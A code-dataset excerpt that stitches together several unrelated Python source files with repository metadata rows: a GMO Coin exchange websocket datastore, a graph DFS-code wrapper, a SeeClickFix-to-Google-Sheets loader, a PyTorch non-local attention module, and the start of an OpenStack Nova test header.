data.get("executedSize", data.get("orderExecutedSize"))
),
losscut_price=Decimal(data["losscutPrice"]),
time_in_force=data["timeInForce"],
)
@staticmethod
def to_positions(data: list[Item]) -> list["Position"]:
return [MessageHelper.to_position(x) for x in data]
@staticmethod
def to_position(data: Item) -> "Position":
return Position(
position_id=data["positionId"],
symbol=Symbol[data["symbol"]],
side=OrderSide[data["side"]],
size=Decimal(data["size"]),
orderd_size=Decimal(data["orderdSize"]),
price=Decimal(data["price"]),
loss_gain=Decimal(data["lossGain"]),
leverage=Decimal(data["leverage"]),
losscut_price=Decimal(data["losscutPrice"]),
timestamp=parse_datetime(data.get("timestamp")),
)
@staticmethod
def to_position_summaries(data: list[Item]) -> list["PositionSummary"]:
return [MessageHelper.to_position_summary(x) for x in data]
@staticmethod
def to_position_summary(data: Item) -> "PositionSummary":
return PositionSummary(
symbol=Symbol[data["symbol"]],
side=OrderSide[data["side"]],
average_position_rate=Decimal(data["averagePositionRate"]),
position_loss_gain=Decimal(data["positionLossGain"]),
sum_order_quantity=Decimal(data["sumOrderQuantity"]),
sum_position_quantity=Decimal(data["sumPositionQuantity"]),
timestamp=parse_datetime(data.get("timestamp"))
if data.get("timestamp")
else datetime.now(timezone.utc),
)
class GMOCoinDataStore(DataStoreManager):
"""
GMOコインのデータストアマネージャー
"""
def _init(self) -> None:
self.create("ticker", datastore_class=TickerStore)
self.create("orderbooks", datastore_class=OrderBookStore)
self.create("trades", datastore_class=TradeStore)
self.create("orders", datastore_class=OrderStore)
self.create("positions", datastore_class=PositionStore)
self.create("executions", datastore_class=ExecutionStore)
self.create("position_summary", datastore_class=PositionSummaryStore)
self.token: Optional[str] = None
async def initialize(self, *aws: Awaitable[aiohttp.ClientResponse]) -> None:
"""
対応エンドポイント
- GET /private/v1/latestExecutions (DataStore: executions)
- GET /private/v1/activeOrders (DataStore: orders)
- GET /private/v1/openPositions (DataStore: positions)
- GET /private/v1/positionSummary (DataStore: position_summary)
- POST /private/v1/ws-auth (Property: token)
"""
for f in asyncio.as_completed(aws):
resp = await f
data = await resp.json()
if (
resp.url.path == "/private/v1/latestExecutions"
and "list" in data["data"]
):
self.executions._onresponse(
MessageHelper.to_executions(data["data"]["list"])
)
if resp.url.path == "/private/v1/activeOrders" and "list" in data["data"]:
self.orders._onresponse(MessageHelper.to_orders(data["data"]["list"]))
if resp.url.path == "/private/v1/openPositions" and "list" in data["data"]:
self.positions._onresponse(
MessageHelper.to_positions(data["data"]["list"])
)
if (
resp.url.path == "/private/v1/positionSummary"
and "list" in data["data"]
):
self.position_summary._onresponse(
MessageHelper.to_position_summaries(data["data"]["list"])
)
if resp.url.path == "/private/v1/ws-auth":
self.token = data["data"]
asyncio.create_task(self._token(resp.__dict__['_raw_session']))
def _onmessage(self, msg: Item, ws: ClientWebSocketResponse) -> None:
if "error" in msg:
logger.warning(msg)
if "channel" in msg:
msg_type = MessageType[msg.get("msgType", MessageType.NONE.name)]
channel: Channel = Channel.from_str(msg["channel"])
# Public
if channel == Channel.TICKER:
self.ticker._onmessage(MessageHelper.to_ticker(msg))
elif channel == Channel.ORDER_BOOKS:
self.orderbooks._onmessage(MessageHelper.to_orderbook(msg))
elif channel == Channel.TRADES:
self.trades._onmessage(MessageHelper.to_trade(msg))
# Private
elif channel == Channel.EXECUTION_EVENTS:
self.orders._onexecution(MessageHelper.to_execution(msg))
self.executions._onmessage(MessageHelper.to_execution(msg))
elif channel == Channel.ORDER_EVENTS:
self.orders._onmessage(MessageHelper.to_order(msg))
elif channel == Channel.POSITION_EVENTS:
self.positions._onmessage(MessageHelper.to_position(msg), msg_type)
elif channel == Channel.POSITION_SUMMARY_EVENTS:
self.position_summary._onmessage(MessageHelper.to_position_summary(msg))
async def _token(self, session: aiohttp.ClientSession):
while not session.closed:
await session.put(
'https://api.coin.z.com/private/v1/ws-auth',
data={"token": self.token},
auth=Auth,
)
await asyncio.sleep(1800.0) # 30 minutes
@property
def ticker(self) -> TickerStore:
return self.get("ticker", TickerStore)
@property
def orderbooks(self) -> OrderBookStore:
return self.get("orderbooks", OrderBookStore)
@property
def trades(self) -> TradeStore:
return self.get("trades", TradeStore)
@property
def orders(self) -> OrderStore:
"""
アクティブオーダーのみ(約定・キャンセル済みは削除される)
"""
return self.get("orders", OrderStore)
@property
def positions(self) -> PositionStore:
return self.get("positions", PositionStore)
@property
def executions(self) -> ExecutionStore:
return self.get("executions", ExecutionStore)
@property
def position_summary(self) -> PositionSummaryStore:
return self.get("position_summary", PositionSummaryStore)
| 29.565154 | 88 | 0.589709 |
795bc1c0075613236f7426167d6bcdb8e4af73fc | 1,860 | py | Python | dfscode/dfs_wrapper.py | idea-iitd/graphgen | 0c74511faeed593dcfa7a6c59fc177812232f7d2 | [
"MIT"
] | 34 | 2020-01-23T11:08:02.000Z | 2022-03-02T01:50:04.000Z | dfscode/dfs_wrapper.py | idea-iitd/graphgen | 0c74511faeed593dcfa7a6c59fc177812232f7d2 | [
"MIT"
] | 6 | 2020-02-17T11:22:15.000Z | 2021-12-20T16:35:00.000Z | dfscode/dfs_wrapper.py | idea-iitd/graphgen | 0c74511faeed593dcfa7a6c59fc177812232f7d2 | [
"MIT"
] | 11 | 2020-01-28T08:10:44.000Z | 2022-01-03T20:31:39.000Z | import os
import subprocess
import tempfile
import pickle
import networkx as nx
def get_min_dfscode(G, temp_path=tempfile.gettempdir()):
input_fd, input_path = tempfile.mkstemp(dir=temp_path)
with open(input_path, 'w') as f:
vcount = len(G.nodes)
f.write(str(vcount) + '\n')
i = 0
d = {}
for x in G.nodes:
d[x] = i
i += 1
f.write(str(G.nodes[x]['label']) + '\n')
ecount = len(G.edges)
f.write(str(ecount) + '\n')
for (u, v) in G.edges:
f.write(str(d[u]) + ' ' + str(d[v]) +
' ' + str(G[u][v]['label']) + '\n')
output_fd, output_path = tempfile.mkstemp(dir=temp_path)
dfscode_bin_path = 'bin/dfscode'
with open(input_path, 'r') as f:
subprocess.call([dfscode_bin_path, output_path, '2'], stdin=f)
with open(output_path, 'r') as dfsfile:
dfs_sequence = []
for row in dfsfile.readlines():
splited_row = row.split()
splited_row = [splited_row[2 * i + 1] for i in range(5)]
dfs_sequence.append(splited_row)
os.close(input_fd)
os.close(output_fd)
try:
os.remove(input_path)
os.remove(output_path)
except OSError:
pass
return dfs_sequence
def graph_from_dfscode(dfscode):
graph = nx.Graph()
for dfscode_egde in dfscode:
i, j, l1, e, l2 = dfscode_egde
graph.add_node(int(i), label=l1)
graph.add_node(int(j), label=l2)
graph.add_edge(int(i), int(j), label=e)
return graph
if __name__ == '__main__':
with open(os.path.expanduser('~/MTP/data/dataset/ENZYMES/graphs/graph180.dat'), 'rb') as f:
G = pickle.load(f)
dfs_code = get_min_dfscode(G)
print(len(dfs_code), G.number_of_edges())
for code in dfs_code:
print(code)
| 25.833333 | 95 | 0.576882 |
795bc1e2cafc3234b0c2086c3007a26be50b8cbe | 4,194 | py | Python | SCF.py | datala/seeClickFix-loader | 884bae2cb3c4585d69f9420ce68a843f4665d121 | [
"Apache-2.0"
] | null | null | null | SCF.py | datala/seeClickFix-loader | 884bae2cb3c4585d69f9420ce68a843f4665d121 | [
"Apache-2.0"
] | null | null | null | SCF.py | datala/seeClickFix-loader | 884bae2cb3c4585d69f9420ce68a843f4665d121 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 3 11:23:21 2017
@author: Cerina
"""
#import json
import sys
import requests
import gspread
from oauth2client.service_account import ServiceAccountCredentials
scope = "https://spreadsheets.google.com/feeds"
credentials = ServiceAccountCredentials.from_json_keyfile_name('client_secret.json', scope)
gs = gspread.authorize(credentials)
year = sys.argv[1]
sheetName = sys.argv[2]
mySheet = gs.open(sheetName).sheet1
mySheet.clear()
mySheet.resize(1, 26)
def loadPage(page):
aPage = str(page)
rstring = 'https://seeclickfix.com/open311/v2/670/requests.json?start_date=' + \
str(year) + '-01-01T00:00:00Z&end_date=' + str(int(year) + 1) + \
'-01-01T00:00:00Z&page=' + aPage + '&per_page=100'
r = requests.get(rstring)
if len(r.json()) == 0:
return 0
else:
#sheet_data is a list of dictionaries
sheet_data = r.json()
#sheet_data = sorted(sheet_data, key = lambda k: k["service_request_id"])
#header_list is list of cell objects
columnnumber = 0
header_list = mySheet.range(1, 1, 1, len(r.json()[0]))
for i in r.json()[0].keys():
header_list[columnnumber].value = i
columnnumber += 1
newSheetStartIndex = 0
#If spreadsheet is has empty first row
if mySheet.get_all_values() == []:
oldSheet = []
#If spreadsheet has data--
#1. Sheet has headers plus value data
elif len(mySheet.get_all_records()) != 0:
#make a list of dictionary of all the records
oldSheet = mySheet.get_all_records()
#Look at the last "requested_datetime" value
last_id = oldSheet[mySheet.row_count -2]["service_request_id"]
last_rowNum_oldSheet = len(oldSheet) + 1
#Look at each row in sheet_data, keeping track of the row number.
#If sheet_data's "requested_timedate" field matches last_time, split sheet_data
#at that row and update sheet_data
if len(sheet_data) != 0:
for i in range(len(sheet_data)):
if last_id == sheet_data[i]["service_request_id"]:
newSheetStartIndex = i + 1
#2. Sheet only has header, no data
else:
oldSheet = []
sheet_data = sheet_data[newSheetStartIndex:]
sheet_data_vals = []
#sheet_data_vals is a list of lists
for i in range(len(sheet_data)):
sheet_data_vals.append(list(sheet_data[i].values()))
#Resize google sheet to fit the data, including a row for the headers
mySheet.resize(len(oldSheet + sheet_data_vals)+1, mySheet.col_count)
#cell_matrix is a list of cell objects
cell_matrix = []
cell_matrix = cell_matrix + header_list
#Make rownumber reflective of the newest row
rownumber = len(oldSheet) + 2
#Each row in sheet_data represents a list, where each list holds the values
for row in sheet_data_vals:
#cellrange = 'A{row}:{letter}{row}'.format(row=rownumber, letter=chr(len(row) + ord('a') - 1))
# get the row from the worksheet
#cell_list is list of cell objects
cell_list = mySheet.range(rownumber, 1, rownumber, len(sheet_data_vals[0]))
columnnumber = 0
#cell represents individual value from the row list
for cell in row:
#cell_list updated with values from row
cell_list[columnnumber].value = row[columnnumber]
columnnumber += 1
# add the cell_list, which represents all cells in a row to the full matrix
cell_matrix = cell_matrix + cell_list
rownumber += 1
# output the full matrix all at once to the worksheet.
mySheet.update_cells(cell_matrix)
return 1
thisPage = 1
while loadPage(thisPage) != 0:
thisPage += 1
| 32.765625 | 106 | 0.58846 |
795bc2575bea2a594325c327430619f3f7d8149b | 5,496 | py | Python | model/attention.py | nSamsow/CSNLN | 309c7451828c8878b85577ee78d4ecd465c045f0 | [
"MIT"
] | null | null | null | model/attention.py | nSamsow/CSNLN | 309c7451828c8878b85577ee78d4ecd465c045f0 | [
"MIT"
] | null | null | null | model/attention.py | nSamsow/CSNLN | 309c7451828c8878b85577ee78d4ecd465c045f0 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.utils import spectral_norm as spectral_norm_fn
from torch.nn.utils import weight_norm as weight_norm_fn
from PIL import Image
from torchvision import transforms
from torchvision import utils as vutils
from model import common
from model.utils.tools import extract_image_patches,\
reduce_mean, reduce_sum, same_padding
#in-scale non-local attention
class NonLocalAttention(nn.Module):
def __init__(self, channel=128, reduction=2, ksize=3, scale=3, stride=1, softmax_scale=10, average=True, conv=common.default_conv):
super(NonLocalAttention, self).__init__()
self.conv_match1 = common.BasicBlock(conv, channel, channel//reduction, 1, bn=False, act=nn.PReLU())
self.conv_match2 = common.BasicBlock(conv, channel, channel//reduction, 1, bn=False, act = nn.PReLU())
self.conv_assembly = common.BasicBlock(conv, channel, channel, 1,bn=False, act=nn.PReLU())
def forward(self, input):
x_embed_1 = self.conv_match1(input)
x_embed_2 = self.conv_match2(input)
x_assembly = self.conv_assembly(input)
N,C,H,W = x_embed_1.shape
x_embed_1 = x_embed_1.permute(0,2,3,1).view((N,H*W,C))
x_embed_2 = x_embed_2.view(N,C,H*W)
score = torch.matmul(x_embed_1, x_embed_2)
score = F.softmax(score, dim=2)
x_assembly = x_assembly.view(N,-1,H*W).permute(0,2,1)
x_final = torch.matmul(score, x_assembly)
return x_final.permute(0,2,1).view(N,-1,H,W)
#cross-scale non-local attention
class CrossScaleAttention(nn.Module):
def __init__(self, channel=128, reduction=2, ksize=3, scale=3, stride=1, softmax_scale=10, average=True, conv=common.default_conv):
super(CrossScaleAttention, self).__init__()
self.ksize = ksize
self.stride = stride
self.softmax_scale = softmax_scale
self.scale = scale
self.average = average
escape_NaN = torch.FloatTensor([1e-4])
self.register_buffer('escape_NaN', escape_NaN)
self.conv_match_1 = common.BasicBlock(conv, channel, channel//reduction, 1, bn=False, act=nn.PReLU())
self.conv_match_2 = common.BasicBlock(conv, channel, channel//reduction, 1, bn=False, act=nn.PReLU())
self.conv_assembly = common.BasicBlock(conv, channel, channel, 1, bn=False, act=nn.PReLU())
#self.register_buffer('fuse_weight', fuse_weight)
def forward(self, input):
#get embedding
embed_w = self.conv_assembly(input)
match_input = self.conv_match_1(input)
# b*c*h*w
shape_input = list(embed_w.size()) # b*c*h*w
input_groups = torch.split(match_input,1,dim=0)
# kernel size on input for matching
kernel = self.scale*self.ksize
# raw_w is extracted for reconstruction
raw_w = extract_image_patches(embed_w, ksizes=[kernel, kernel],
strides=[self.stride*self.scale,self.stride*self.scale],
rates=[1, 1],
padding='same') # [N, C*k*k, L]
# raw_shape: [N, C, k, k, L]
raw_w = raw_w.view(shape_input[0], shape_input[1], kernel, kernel, -1)
raw_w = raw_w.permute(0, 4, 1, 2, 3) # raw_shape: [N, L, C, k, k]
raw_w_groups = torch.split(raw_w, 1, dim=0)
# downscaling X to form Y for cross-scale matching
ref = F.interpolate(input, scale_factor=1./self.scale, mode='bilinear')
ref = self.conv_match_2(ref)
w = extract_image_patches(ref, ksizes=[self.ksize, self.ksize],
strides=[self.stride, self.stride],
rates=[1, 1],
padding='same')
shape_ref = ref.shape
# w shape: [N, C, k, k, L]
w = w.view(shape_ref[0], shape_ref[1], self.ksize, self.ksize, -1)
w = w.permute(0, 4, 1, 2, 3) # w shape: [N, L, C, k, k]
w_groups = torch.split(w, 1, dim=0)
y = []
scale = self.softmax_scale
# 1*1*k*k
#fuse_weight = self.fuse_weight
for xi, wi, raw_wi in zip(input_groups, w_groups, raw_w_groups):
# normalize
wi = wi[0] # [L, C, k, k]
max_wi = torch.max(torch.sqrt(reduce_sum(torch.pow(wi, 2),
axis=[1, 2, 3],
keepdim=True)),
self.escape_NaN)
wi_normed = wi/ max_wi
# Compute correlation map
xi = same_padding(xi, [self.ksize, self.ksize], [1, 1], [1, 1]) # xi: 1*c*H*W
yi = F.conv2d(xi, wi_normed, stride=1) # [1, L, H, W] L = shape_ref[2]*shape_ref[3]
yi = yi.view(1,shape_ref[2] * shape_ref[3], shape_input[2], shape_input[3]) # (B=1, C=32*32, H=32, W=32)
# rescale matching score
yi = F.softmax(yi*scale, dim=1)
if self.average == False:
yi = (yi == yi.max(dim=1,keepdim=True)[0]).float()
# deconv for reconsturction
wi_center = raw_wi[0]
yi = F.conv_transpose2d(yi, wi_center, stride=self.stride*self.scale, padding=self.scale)
yi =yi/6.
y.append(yi)
y = torch.cat(y, dim=0)
return y
| 44.682927 | 135 | 0.579148 |
795bc2dab06dfadbd8b2fe39743610e9164efa96 | 475 | py | Python | missingnumberinarray.py | idvipul1999/Microsoft_GeeksforGeeks | 9e294f3beb986bf9eae00e22a3599551b4808008 | [
"MIT"
] | null | null | null | missingnumberinarray.py | idvipul1999/Microsoft_GeeksforGeeks | 9e294f3beb986bf9eae00e22a3599551b4808008 | [
"MIT"
] | null | null | null | missingnumberinarray.py | idvipul1999/Microsoft_GeeksforGeeks | 9e294f3beb986bf9eae00e22a3599551b4808008 | [
"MIT"
] | null | null | null | import math
import os
import random
import re
import sys
def missing(arr):
#CODE 1 is here
prev=arr[0]
for i in range(1,len(arr)):
diff = abs(arr[i]-prev)
if(diff==1):
prev = arr[i]
else:
return(arr[i]-1)
t = int(input())
arr=[]
for j in range(0,t):
n = int(input())
list1 = list(map(int, input().split()[:(n-)]))
result=missing(list1,n)
arr.append(result)
for i in range(0,t):
print(arr[i])
| 17.592593 | 50 | 0.543158 |
795bc47aa9a4335e893a22643bfb4e5b5772170f | 1,201 | py | Python | import_savedmodel_to_tfb.py | yhwang/tf-utility | 728f42fa7b3e1b8bbcaf5e9514267f7b8b298e16 | [
"Apache-2.0"
] | null | null | null | import_savedmodel_to_tfb.py | yhwang/tf-utility | 728f42fa7b3e1b8bbcaf5e9514267f7b8b298e16 | [
"Apache-2.0"
] | null | null | null | import_savedmodel_to_tfb.py | yhwang/tf-utility | 728f42fa7b3e1b8bbcaf5e9514267f7b8b298e16 | [
"Apache-2.0"
] | null | null | null | import sys
import argparse
import tensorflow as tf
from tensorflow.python.platform import app
from tensorflow.python.summary import summary
def import_to_tensorboard(savedmodel_dir, tag, log_dir):
"""Load a SavedModel and export it to tensorbloard log dir
Args:
savedmodel_dir: The location of the savedmodel
log_dir: tensorboard log dir
"""
with tf.Session(graph=tf.Graph()) as sess:
tf.saved_model.loader.load(
sess, [tag], savedmodel_dir)
log_writer = summary.FileWriter(log_dir)
log_writer.add_graph(sess.graph)
print("Start the tensorboard by:"
"tensorboard --logdir={}".format(log_dir))
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Convert savedmodel to tensorboard log')
parser.add_argument('--savedmodel_dir', type=str, nargs=1,
help='SavedModel directory')
parser.add_argument('--tag', nargs=1, default=[tf.saved_model.tag_constants.SERVING],
help='SavedModel tag')
parser.add_argument('--log_dir', nargs=1, type=str, help='tensorbloard log dir')
args = parser.parse_args()
import_to_tensorboard(args.savedmodel_dir[0], args.tag[0], args.log_dir[0])
| 33.361111 | 87 | 0.713572 |
795bc4868c8b92eefcaa2f621e2c1f89a8c7eacc | 2,273 | py | Python | tests/transformers/map_keys_test.py | santunioni/transformer | a34b8b40cba81382c8483d590050c3e36cee5bff | [
"MIT"
] | 1 | 2022-02-21T22:15:08.000Z | 2022-02-21T22:15:08.000Z | tests/transformers/map_keys_test.py | santunioni/Transformer | a34b8b40cba81382c8483d590050c3e36cee5bff | [
"MIT"
] | null | null | null | tests/transformers/map_keys_test.py | santunioni/Transformer | a34b8b40cba81382c8483d590050c3e36cee5bff | [
"MIT"
] | null | null | null | import pytest
from resources import credito
from transformer.transformers.map_keys import MapKeys, MapKeysConfig
@pytest.fixture
def metadata_credito():
return {"type": "deal", "origin": "pipedrive"}
@pytest.fixture(scope="session")
def target_data():
return credito.target_data()
@pytest.fixture(scope="session")
def mapping():
return credito.mapping()
@pytest.fixture
def nested_mapping():
return {
"id": "@{origin}_@{type}_id",
"cliente.dados_bancarios.$[0].digito_agencia": "bank_data.$[0].agency_digit",
"cliente.dados_bancarios.$[0].digito_conta": "bank_data.$[0].account_digit",
"cliente.dados_bancarios.$[0].tipo_conta": "bank_data.$[0].account_type",
"cliente.cpf": "client.cpf",
"cliente.email": "client.email",
"cliente.nome": "name",
"operacoes_credito.$[0].condicao_credito.despesas.$[0].codigo": "bank_data.$[0].credit_operations.$[0].expenses_code", # noqa
"operacoes_credito.$[0].condicao_credito.valor_solicitado": "bank_data.$[0].credit_operations.$[0].valor_solicitado", # noqa
}
@pytest.fixture
def nested_target_data():
return {
"pipedrive_deal_id": 1645687,
"client": {
"cpf": "99915697902",
"email": "marliaparecidaanadasneves-77@mail.com",
},
"name": "Marli Aparecida Ana das Neves",
"bank_data": [
{
"agency_digit": "4",
"account_digit": "1",
"account_type": "CONTA_CORRENTE_INDIVIDUAL",
"credit_operations": [
{"expenses_code": 1234, "valor_solicitado": 4117.48}
],
}
],
}
def test_mapped_dict(credito_payload, metadata_credito, target_data, mapping):
mapper = MapKeys(config=MapKeysConfig(mapping=mapping, preserve_unmapped=False))
assert mapper.transform(credito_payload, metadata_credito)[0] == target_data
def test_unflatted_dict(
nested_mapping, nested_target_data, credito_payload, metadata_credito
):
mapper = MapKeys(
config=MapKeysConfig(mapping=nested_mapping, preserve_unmapped=False)
)
actual = mapper.transform(credito_payload, metadata_credito)[0]
assert nested_target_data == actual
| 31.569444 | 134 | 0.648922 |
795bc4aebc7e52e17fbc251ac32cec56aeac1336 | 5,033 | py | Python | examples/mnist_vae.py | joshuagornall/jax | c97cd0a526c12ad81988fd58c1c66df4ddd71813 | [
"ECL-2.0",
"Apache-2.0"
] | 17,375 | 2018-11-18T02:15:55.000Z | 2022-03-31T23:49:46.000Z | examples/mnist_vae.py | joshuagornall/jax | c97cd0a526c12ad81988fd58c1c66df4ddd71813 | [
"ECL-2.0",
"Apache-2.0"
] | 5,018 | 2018-11-22T17:04:07.000Z | 2022-03-31T23:36:25.000Z | examples/mnist_vae.py | joshuagornall/jax | c97cd0a526c12ad81988fd58c1c66df4ddd71813 | [
"ECL-2.0",
"Apache-2.0"
] | 1,805 | 2018-11-21T10:13:53.000Z | 2022-03-31T23:49:19.000Z | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A basic variational autoencoder (VAE) on binarized MNIST using Numpy and JAX.
This file uses the stax network definition library and the optimizers
optimization library.
"""
import os
import time
import matplotlib.pyplot as plt
import jax
import jax.numpy as jnp
from jax import jit, grad, lax, random
from jax.experimental import optimizers
from jax.experimental import stax
from jax.experimental.stax import Dense, FanOut, Relu, Softplus
from examples import datasets
def gaussian_kl(mu, sigmasq):
"""KL divergence from a diagonal Gaussian to the standard Gaussian."""
return -0.5 * jnp.sum(1. + jnp.log(sigmasq) - mu**2. - sigmasq)
def gaussian_sample(rng, mu, sigmasq):
"""Sample a diagonal Gaussian."""
return mu + jnp.sqrt(sigmasq) * random.normal(rng, mu.shape)
def bernoulli_logpdf(logits, x):
"""Bernoulli log pdf of data x given logits."""
return -jnp.sum(jnp.logaddexp(0., jnp.where(x, -1., 1.) * logits))
def elbo(rng, params, images):
"""Monte Carlo estimate of the negative evidence lower bound."""
enc_params, dec_params = params
mu_z, sigmasq_z = encode(enc_params, images)
logits_x = decode(dec_params, gaussian_sample(rng, mu_z, sigmasq_z))
return bernoulli_logpdf(logits_x, images) - gaussian_kl(mu_z, sigmasq_z)
def image_sample(rng, params, nrow, ncol):
"""Sample images from the generative model."""
_, dec_params = params
code_rng, img_rng = random.split(rng)
logits = decode(dec_params, random.normal(code_rng, (nrow * ncol, 10)))
sampled_images = random.bernoulli(img_rng, jnp.logaddexp(0., logits))
return image_grid(nrow, ncol, sampled_images, (28, 28))
def image_grid(nrow, ncol, imagevecs, imshape):
"""Reshape a stack of image vectors into an image grid for plotting."""
images = iter(imagevecs.reshape((-1,) + imshape))
return jnp.vstack([jnp.hstack([next(images).T for _ in range(ncol)][::-1])
for _ in range(nrow)]).T
encoder_init, encode = stax.serial(
Dense(512), Relu,
Dense(512), Relu,
FanOut(2),
stax.parallel(Dense(10), stax.serial(Dense(10), Softplus)),
)
decoder_init, decode = stax.serial(
Dense(512), Relu,
Dense(512), Relu,
Dense(28 * 28),
)
if __name__ == "__main__":
step_size = 0.001
num_epochs = 100
batch_size = 32
nrow, ncol = 10, 10 # sampled image grid size
test_rng = random.PRNGKey(1) # fixed prng key for evaluation
imfile = os.path.join(os.getenv("TMPDIR", "/tmp/"), "mnist_vae_{:03d}.png")
train_images, _, test_images, _ = datasets.mnist(permute_train=True)
num_complete_batches, leftover = divmod(train_images.shape[0], batch_size)
num_batches = num_complete_batches + bool(leftover)
enc_init_rng, dec_init_rng = random.split(random.PRNGKey(2))
_, init_encoder_params = encoder_init(enc_init_rng, (batch_size, 28 * 28))
_, init_decoder_params = decoder_init(dec_init_rng, (batch_size, 10))
init_params = init_encoder_params, init_decoder_params
opt_init, opt_update, get_params = optimizers.momentum(step_size, mass=0.9)
train_images = jax.device_put(train_images)
test_images = jax.device_put(test_images)
def binarize_batch(rng, i, images):
i = i % num_batches
batch = lax.dynamic_slice_in_dim(images, i * batch_size, batch_size)
return random.bernoulli(rng, batch)
@jit
def run_epoch(rng, opt_state, images):
def body_fun(i, opt_state):
elbo_rng, data_rng = random.split(random.fold_in(rng, i))
batch = binarize_batch(data_rng, i, images)
loss = lambda params: -elbo(elbo_rng, params, batch) / batch_size
g = grad(loss)(get_params(opt_state))
return opt_update(i, g, opt_state)
return lax.fori_loop(0, num_batches, body_fun, opt_state)
@jit
def evaluate(opt_state, images):
params = get_params(opt_state)
elbo_rng, data_rng, image_rng = random.split(test_rng, 3)
binarized_test = random.bernoulli(data_rng, images)
test_elbo = elbo(elbo_rng, params, binarized_test) / images.shape[0]
sampled_images = image_sample(image_rng, params, nrow, ncol)
return test_elbo, sampled_images
opt_state = opt_init(init_params)
for epoch in range(num_epochs):
tic = time.time()
opt_state = run_epoch(random.PRNGKey(epoch), opt_state, train_images)
test_elbo, sampled_images = evaluate(opt_state, test_images)
print("{: 3d} {} ({:.3f} sec)".format(epoch, test_elbo, time.time() - tic))
plt.imsave(imfile.format(epoch), sampled_images, cmap=plt.cm.gray)
| 36.471014 | 80 | 0.722631 |
795bc4ddc7ac0278618fdb4f39277b43deff2941 | 3,181 | py | Python | BEASF.py | haddomou/COVID-CXNet | d7546401b38a2d2ca70ee98aa7ebd9e23c3aa05c | [
"MIT"
] | 2 | 2020-09-07T06:03:11.000Z | 2022-02-22T22:17:23.000Z | BEASF.py | ShubhamAggarwal2000/COVID-CXNet | 1baa9f7b8f4af86aab42dd05e44a3357813662d6 | [
"MIT"
] | null | null | null | BEASF.py | ShubhamAggarwal2000/COVID-CXNet | 1baa9f7b8f4af86aab42dd05e44a3357813662d6 | [
"MIT"
] | null | null | null | import numpy as np
import copy
def subhist(image_pdf, minimum, maximum, normalize):
"""
Compute the subhistogram between [minimum, maximum] of a given histogram image_pdf
:param image_pdf: numpy.array
:param minimum: int
:param maximum: int
:param normalize: boolean
:return: numpy.array
"""
hi = np.zeros(shape=image_pdf.shape)
total = 0
for idx in range(minimum, maximum+1):
total += image_pdf[idx]
hi[idx] = image_pdf[idx]
if normalize:
for idx in range(minimum, maximum+1):
hi[idx] /= total
return hi
def CDF(hist):
"""
Compute the CDF of the input histogram
:param hist: numpy.array()
:return: numpy.array()
"""
cdf = np.zeros(shape=hist.shape)
cdf[0] = hist[0]
for idx in range(1, len(hist)):
cdf[idx] = cdf[idx - 1] + hist[idx]
return cdf
def BEASF(image, gamma):
"""
Compute the Bi-Histogram Equalization with Adaptive Sigmoid Functions algorithm (BEASF)
A python implementation of the original MATLAB code:
https://mathworks.com/matlabcentral/fileexchange/47517-beasf-image-enhancer-for-gray-scale-images
The algorithm is introduced by E. F. Arriaga-Garcia et al., in the research paper:
https://ieeexplore.ieee.org/document/6808563
:param image: numpy.ndarray
:param gamma: float [0, 1]
:return: numpy.ndarray
"""
m = int(np.mean(image, dtype=np.int32))
h = np.histogram(image, bins=256)[0] / (image.shape[0] * image.shape[1])
h_lower = subhist(image_pdf=h, minimum=0, maximum=m, normalize=True)
h_upper = subhist(image_pdf=h, minimum=m, maximum=255, normalize=True)
cdf_lower = CDF(hist=h_lower)
cdf_upper = CDF(hist=h_upper)
# Find x | CDF(x) = 0.5
half_low = 0
for idx in range(0, m+2):
if cdf_lower[idx] > 0.5:
half_low = idx
break
half_up = 0
for idx in range(m, 256):
if cdf_upper[idx + 1] > 0.5:
half_up = idx
break
# sigmoid CDF creation
tones_low = np.arange(0, m+1, 1)
x_low = 5.0 * (tones_low - half_low) / m # shift & scale intensity x to place sigmoid [-2.5, 2.5]
s_low = 1 / (1 + np.exp(-gamma * x_low)) # lower sigmoid
tones_up = np.arange(m, 256, 1)
x_up = 5.0 * (tones_up - half_up) / (255 - m) # shift & scale intensity x to place sigmoid [-2.5, 2.5]
s_up = 1 / (1 + np.exp(-gamma * x_up)) # upper sigmoid
mapping_vector = np.zeros(shape=(256,))
for idx in range(0, m+1):
mapping_vector[idx] = np.int32(m * s_low[idx])
minimum = mapping_vector[0]
maximum = mapping_vector[m]
for idx in range(0, m+1):
mapping_vector[idx] = np.int32((m / (maximum - minimum)) * (mapping_vector[idx] - minimum))
for idx in range(m+1, 256):
mapping_vector[idx] = np.int32(m + (255 - m) * s_up[idx - m - 1])
minimum = mapping_vector[m + 1]
maximum = mapping_vector[255]
for idx in range(m+1, 256):
mapping_vector[idx] = (255 - m) * (mapping_vector[idx] - minimum) / (maximum - minimum) + m
res = copy.deepcopy(image)
res[:, :] = mapping_vector[image[:, :]]
return res
| 32.793814 | 107 | 0.614587 |
795bc519da533731fcf545dfb06e3539e5078b90 | 6,416 | py | Python | nova/tests/unit/scheduler/weights/test_weights_affinity.py | lixiaoy1/nova | 357b8b38e88300948bb2e07d1bbaabd1e9d7b60e | [
"Apache-2.0"
] | 1 | 2018-08-19T02:13:16.000Z | 2018-08-19T02:13:16.000Z | nova/tests/unit/scheduler/weights/test_weights_affinity.py | lixiaoy1/nova | 357b8b38e88300948bb2e07d1bbaabd1e9d7b60e | [
"Apache-2.0"
] | 2 | 2021-03-31T19:25:14.000Z | 2021-12-13T20:15:06.000Z | nova/tests/unit/scheduler/weights/test_weights_affinity.py | lixiaoy1/nova | 357b8b38e88300948bb2e07d1bbaabd1e9d7b60e | [
"Apache-2.0"
] | 1 | 2020-07-22T22:15:29.000Z | 2020-07-22T22:15:29.000Z | # Copyright (c) 2015 Ericsson AB
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
